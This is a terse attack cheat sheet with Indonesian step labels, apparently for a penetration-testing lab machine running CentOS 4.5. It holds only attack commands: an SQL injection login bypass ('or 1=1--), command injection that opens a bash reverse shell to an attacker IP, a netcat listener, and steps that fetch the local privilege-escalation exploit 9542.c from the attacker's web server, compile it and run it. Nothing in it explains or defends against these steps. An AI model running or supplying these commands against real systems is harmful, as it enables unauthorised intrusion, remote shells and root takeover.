Persiapan 

  Terminal 1
    	searchsploit centos 4.5 
    	searchsploit -m linux_x86/local/9542.c
    	python -m http.server 80


  Terminal 2 or Terminal Server
	ifconfig
    	nc -lnvp 1234

Mulai
  Terminal 3
	  sudo netdiscover


  Open Web 
	  username = 'or 1=1--
	  password = 'or 1=1--

  Administrative Web Console
	  ;bash -i >& /dev/tcp/192.168.#.#/1234 0>&1

	
  Terminal 2 or Terminal Server
	  lsb_release -a
	  cd /tmp && wget 192.168.#.#:80/9542.c && gcc 9542.c -o agung && ./agung
	  whoami

	  wget 192.168.#.#:80/

	
